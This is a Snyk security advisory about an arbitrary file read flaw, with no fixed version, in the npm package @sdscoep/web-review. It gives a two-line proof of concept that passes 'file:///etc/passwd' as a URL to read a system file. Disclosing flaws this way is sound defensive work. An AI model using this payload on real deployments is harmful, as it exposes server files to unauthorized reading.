Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for @sdscoep/web-review
.
@sdscoep/web-review is a npm package which will compile reports consisting of multiple criteria.
Affected versions of this package are vulnerable to Arbitrary File Read.
It is possible to read arbitrary file by using the "file:///" URI as a url
.
const webReview = require("@sdscoep/web-review");
webReview.exec([ { url: "file:///etc/passwd", resolution: ["480x320"], } ]);